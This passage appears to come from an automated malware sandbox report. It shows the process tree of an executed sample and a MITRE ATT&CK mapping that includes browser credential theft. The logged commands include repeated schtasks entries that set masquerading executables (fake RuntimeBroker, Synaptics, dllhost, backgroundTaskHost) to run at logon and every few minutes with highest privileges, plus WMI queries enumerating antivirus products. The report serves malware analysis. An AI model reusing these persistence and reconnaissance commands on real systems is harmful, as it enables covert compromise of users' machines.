1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3316

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Oracle\Java\.oracle_jre_usage\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\Oracle\Java\.oracle_jre_usage\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Oracle\Java\.oracle_jre_usage\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SynapticsS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Synaptics.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Synaptics" /sc ONLOGON /tr "'C:\Users\Default User\Synaptics.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SynapticsS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Synaptics.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 14 /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Bridgesurrogate" /sc ONLOGON /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BridgesurrogateB" /sc MINUTE /mo 10 /tr "'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3396

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"
1⤵
PID:2560
- C:\Windows\system32\cmd.exe
  cmd /c wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
  2⤵
  PID:4436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    PID:1508
- C:\Windows\system32\cmd.exe
  cmd /c wmic cpu get name
  2⤵
  PID:1728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:832

C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"
1⤵
PID:4344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery